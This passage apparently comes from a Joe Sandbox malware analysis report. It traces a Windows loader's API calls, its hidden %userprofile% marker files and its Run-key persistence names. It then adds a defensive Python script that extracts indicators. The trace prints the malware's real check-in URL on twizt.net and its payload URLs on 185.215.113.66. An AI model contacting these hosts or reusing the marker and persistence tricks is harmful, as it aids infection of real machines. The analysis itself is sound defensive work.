                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/1), ref: 00AE10BF
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/2), ref: 00AE10CA
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/3), ref: 00AE10D5
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/4), ref: 00AE10E0
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/5), ref: 00AE10EB
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/6), ref: 00AE10F6
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_1), ref: 00AE1101
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_2), ref: 00AE110C
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_3), ref: 00AE1117
                                                                                Strings
                                                                                • http://185.215.113.66/_2, xrefs: 00AE1107
                                                                                • http://185.215.113.66/_1, xrefs: 00AE10FC
                                                                                • http://185.215.113.66/2, xrefs: 00AE10C5
                                                                                • http://185.215.113.66/3, xrefs: 00AE10D0
                                                                                • http://185.215.113.66/5, xrefs: 00AE10E6
                                                                                • http://185.215.113.66/6, xrefs: 00AE10F1
                                                                                • http://185.215.113.66/_3, xrefs: 00AE1112
                                                                                • http://185.215.113.66/1, xrefs: 00AE10BA
                                                                                • http://185.215.113.66/4, xrefs: 00AE10DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2002847781.0000000000AE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000010.00000002.2002834770.0000000000AE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000010.00000002.2002873028.0000000000AE4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_ae0000_1245832676.jbxd
                                                                                Similarity
                                                                                • API ID: CacheDeleteEntry$EnvironmentExistsExpandFilePathSleepStringswsprintf
                                                                                • String ID: http://185.215.113.66/1$http://185.215.113.66/2$http://185.215.113.66/3$http://185.215.113.66/4$http://185.215.113.66/5$http://185.215.113.66/6$http://185.215.113.66/_1$http://185.215.113.66/_2$http://185.215.113.66/_3
                                                                                • API String ID: 1624407425-19798704
                                                                                • Opcode ID: bf8f6af40e7dd4487eb6e5f1f644a594c7822d32ecd37beef4944e117d3e8b47
                                                                                • Instruction ID: efdb2d8039d7198dfb41d91250a95fb2a018ebb8939968d77484edcb419d08a8
                                                                                • Opcode Fuzzy Hash: bf8f6af40e7dd4487eb6e5f1f644a594c7822d32ecd37beef4944e117d3e8b47
                                                                                • Instruction Fuzzy Hash: CAF0A0712803DEF78301E7E66C5FB49356C7A84B417410810F1468D4D1C9E44846DF36

Control-flow Graph
• Block 5: ae1000-ae104b (ExpandEnvironmentStringsW, wsprintfW)
• Block 7: ae104d-ae104f
• Block 8: ae1053-ae107c
• Block 9: ae108d-ae1090
• Block 11: ae107e-ae1084
• Block 12: ae108b
• Edges: 5->7, 5->8, 7->9, 8->11, 8->12, 11->12, 12->9
                                                                                APIs
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00AE101A
                                                                                • wsprintfW.USER32 ref: 00AE1033
                                                                                • PathFileExistsW.KERNELBASE(?), ref: 00AE1043
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 00AE1069
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00AE1085
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2002847781.0000000000AE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000010.00000002.2002834770.0000000000AE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000010.00000002.2002873028.0000000000AE4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_ae0000_1245832676.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                • String ID: %s\ssss3444443.jpg$%userprofile%$@1Wu.Wu$^Iu
                                                                                • API String ID: 750032643-433313667
                                                                                • Opcode ID: e55e9e071c83e0c1da5c83b90fc0900ea3659bfaff2d0e7bd3c472156ea60d7c
                                                                                • Instruction ID: db3f35223980828397a6bc6c2819d53d9d6954979ba927021de6f9aa10f2ce18
                                                                                • Opcode Fuzzy Hash: e55e9e071c83e0c1da5c83b90fc0900ea3659bfaff2d0e7bd3c472156ea60d7c
                                                                                • Instruction Fuzzy Hash: 64014FB094035CABDB30DBA09C8AFE5733CAB44704F0046A4A719AA0D1DAB05AC5DBA5

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 003F10AB
                                                                                  • Part of subcall function 003F1000: ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 003F101A
                                                                                  • Part of subcall function 003F1000: wsprintfW.USER32 ref: 003F1033
                                                                                  • Part of subcall function 003F1000: PathFileExistsW.KERNELBASE(?), ref: 003F1043
                                                                                • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000002,00000000), ref: 003F1190
                                                                                • RegDeleteValueW.KERNELBASE(00000000,Windows Update 39405), ref: 003F11BE
                                                                                • RegCloseKey.KERNELBASE(00000000), ref: 003F11CA
                                                                                • Sleep.KERNELBASE(000007D0), ref: 003F11D5
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000002,00000000), ref: 003F11ED
                                                                                • RegDeleteValueW.KERNELBASE(00000000,Windows Update 39405), ref: 003F121B
                                                                                • RegCloseKey.KERNELBASE(00000000), ref: 003F1227
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2075448396.00000000003F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 003F0000, based on PE: true
• Associated: 00000012.00000002.2075429083.00000000003F0000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000012.00000002.2075465997.00000000003F2000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000012.00000002.2075481764.00000000003F3000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000012.00000002.2075496400.00000000003F4000.00000002.00000001.01000000.00000010.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_3f0000_300129380.jbxd
                                                                                Similarity
                                                                                • API ID: CloseDeleteOpenSleepValue$EnvironmentExistsExpandFilePathStringswsprintf
                                                                                • String ID: (%?$0"?$0&?$@'?$Desktop Window Manager$Host Process for Windows Services$Microsoft Windows Driver Configuration$Microsoft Windows Installer Svc$Microsoft Windows Service$Microsoft Windows Update Service$Microsoft Windows Update Services$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$WinCfgMgr$Windows Update 362646246$Windows Update 39405$Windows Update 4859540300$Windows Update 49400405050$Windows Update 495006960$Windows Update 7080607400$Windows Update 75849348$Windows Update Service Manager$Windows Upgrade Manager$\#?$\$?$`%?$d"?$h&?
                                                                                • API String ID: 2575504554-2501668519
                                                                                • Opcode ID: 686e9f2868b53ed851826fd44dab8971b7186ceceb9a65337a6ab07752330cff
                                                                                • Instruction ID: 3d9dba7689559417f65f9b06fe92f6d55ce205a24015536bc21dd99dfc84c27a
                                                                                • Opcode Fuzzy Hash: 686e9f2868b53ed851826fd44dab8971b7186ceceb9a65337a6ab07752330cff
                                                                                • Instruction Fuzzy Hash: A241F6B990020CEBEB16CFE5E948ABFBBB4BB04709F204508E7057B251C7B45A48DF94

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 003F101A
                                                                                • wsprintfW.USER32 ref: 003F1033
                                                                                • PathFileExistsW.KERNELBASE(?), ref: 003F1043
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 003F1069
                                                                                • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 003F1085
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2075448396.00000000003F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 003F0000, based on PE: true
• Associated: 00000012.00000002.2075429083.00000000003F0000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000012.00000002.2075465997.00000000003F2000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000012.00000002.2075481764.00000000003F3000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000012.00000002.2075496400.00000000003F4000.00000002.00000001.01000000.00000010.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_3f0000_300129380.jbxd
                                                                                Similarity
                                                                                • API ID: File$ChangeCloseCreateEnvironmentExistsExpandFindNotificationPathStringswsprintf
                                                                                • String ID: %s\975666578.jpg$%userprofile%$^Iu
                                                                                • API String ID: 2220190937-2121632346
                                                                                • Opcode ID: 14a97d898b15f3d5b6c803fd67416b17016e482cf978a9f4e5b39284148430ec
                                                                                • Instruction ID: 65382bdab4f4b8eecd3d6d66b58742f7a206251cc919aaf3be85704cbe322646
                                                                                • Opcode Fuzzy Hash: 14a97d898b15f3d5b6c803fd67416b17016e482cf978a9f4e5b39284148430ec
                                                                                • Instruction Fuzzy Hash: 05014FB154031DEBDB219B609C4AFF6733CAB44704F0086A4A719A60D1DEB45AC9DBA9
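The three functions above are the same routine compiled into processes 15, 16 and 18: expand %userprofile%, wsprintfW a marker name into it, PathFileExistsW, and if the file is absent CreateFileW it with GENERIC_WRITE (40000000), CREATE_NEW (00000001) and FILE_ATTRIBUTE_HIDDEN (00000002), then close the handle. That hidden .jpg in the profile root is the infection marker the "may stop execution after checking mutex" signature refers to; the call Joe labels FindCloseChangeNotification at 006F10F5 is the same handle close that the process 16 copy resolves as CloseHandle at 00AE1085. Around it sit the check-in to http://twizt.net/ALLSTATA with a Chrome User-Agent, the DeleteUrlCacheEntry purge of the nine payload URLs on 185.215.113.66, and the removal of the "Windows Update 39405" Run value from both hives (the two Sleep values 000007D0 and 000003E8 are 2000 and 1000 ms). An analyst usually wants those details as indicators rather than as trace lines, so the following Python, an added example that is not Joe Sandbox's code, parses the "APIs" lines as printed here into URLs, hosts, registry keys and values, decodes the CreateFileW arguments, and rebuilds the marker paths from the "String ID" lines. The TRACE and STRING_IDS inputs are copied from this page; the function names and the constant tables are mine (the tables are the standard Win32 values).

```python
"""Extract indicators from Joe Sandbox "APIs" trace lines (added example)."""
import re
from urllib.parse import urlsplit

# Constructed sample: a subset of the trace lines shown on this page for
# processes 15, 16 and 18, exactly as the report prints them.
TRACE = r"""
ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 006F108A
PathFileExistsW.KERNELBASE(?), ref: 006F10B3
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 006F10D9
InternetOpenUrlA.WININET(00000000,http://twizt.net/ALLSTATA,00000000,00000000,00000000,00000000), ref: 006F1033
DeleteUrlCacheEntry.WININET(http://185.215.113.66/1), ref: 00AE10BF
DeleteUrlCacheEntry.WININET(http://185.215.113.66/_3), ref: 00AE1117
RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000002,00000000), ref: 003F1190
RegDeleteValueW.KERNELBASE(00000000,Windows Update 39405), ref: 003F11BE
RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000002,00000000), ref: 003F11ED
RegDeleteValueW.KERNELBASE(00000000,Windows Update 39405), ref: 003F121B
"""

# Constructed sample: the "String ID" lines of the three marker-file
# functions (Joe Sandbox joins a function's strings with "$").
STRING_IDS = [
    r"%s\78876rtb.jpg$%userprofile%$@1Wu.Wu$^Iu",
    r"%s\ssss3444443.jpg$%userprofile%$@1Wu.Wu$^Iu",
    r"%s\975666578.jpg$%userprofile%$^Iu",
]

LINE_RE = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")

# Standard Win32 constants for the arguments the report prints as hex.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTRS = {0x1: "FILE_ATTRIBUTE_READONLY", 0x2: "FILE_ATTRIBUTE_HIDDEN",
              0x4: "FILE_ATTRIBUTE_SYSTEM", 0x80: "FILE_ATTRIBUTE_NORMAL"}
HIVES = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}


def parse_trace(text):
    """Return (api, module, [args], ref) for each trace line.

    Arguments are split on ','; that is correct for the lines above but a
    User-Agent argument containing commas would need a smarter split.
    """
    calls = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            calls.append((m["api"], m["module"], m["args"].split(","), m["ref"]))
    return calls


def flags(value, table):
    """Names of the bits from `table` that are set in `value`."""
    return [name for bit, name in table.items() if value & bit]


def decode_create_file(args):
    """Name the CreateFileW access / share / disposition / attribute arguments."""
    access, disposition, attrs = int(args[1], 16), int(args[4], 16), int(args[5], 16)
    return {
        "access": flags(access, GENERIC_ACCESS),
        "share": int(args[2], 16),
        "disposition": DISPOSITION.get(disposition, hex(disposition)),
        "attributes": flags(attrs, FILE_ATTRS),
    }


def marker_paths(string_ids):
    """Rebuild the wsprintfW("%s\\<name>", <expanded %userprofile%>) marker path."""
    paths = []
    for sid in string_ids:
        parts = sid.split("$")
        fmt = next(p for p in parts if p.startswith("%s\\"))
        env = next(p for p in parts if p.startswith("%") and p.endswith("%") and p != "%s")
        paths.append(fmt.replace("%s", env, 1))
    return paths


def extract_iocs(text):
    """Collect network, marker-file and registry indicators from the trace."""
    iocs = {"urls": set(), "hosts": set(), "run_keys": set(), "run_values": set(),
            "marker_create": None}
    hive = None  # RegDeleteValueW only sees the handle, so remember the last opened hive
    for api, _module, args, _ref in parse_trace(text):
        for a in args:
            if a.startswith(("http://", "https://")):
                iocs["urls"].add(a)
                iocs["hosts"].add(urlsplit(a).hostname)
        if api == "CreateFileW":
            iocs["marker_create"] = decode_create_file(args)
        elif api == "RegOpenKeyExW":
            hive = HIVES.get(int(args[0], 16), args[0])
            iocs["run_keys"].add(hive + "\\" + args[1])
        elif api == "RegDeleteValueW" and hive:
            iocs["run_values"].add((hive, args[1]))
    return iocs


if __name__ == "__main__":
    for key, value in extract_iocs(TRACE).items():
        print(key, value)
    print("marker files:", marker_paths(STRING_IDS))
```

Run against the lines above, extract_iocs reports twizt.net and 185.215.113.66 as hosts, both Run keys with the "Windows Update 39405" value, and a CreateFileW decoded as GENERIC_WRITE, share 0, CREATE_NEW, FILE_ATTRIBUTE_HIDDEN; marker_paths gives the three %userprofile% paths, which are the host artefacts to sweep for. CREATE_NEW is what makes the file a mutex: the call fails with ERROR_FILE_EXISTS on a second run, which is why the function checks PathFileExistsW first and the caller bails out.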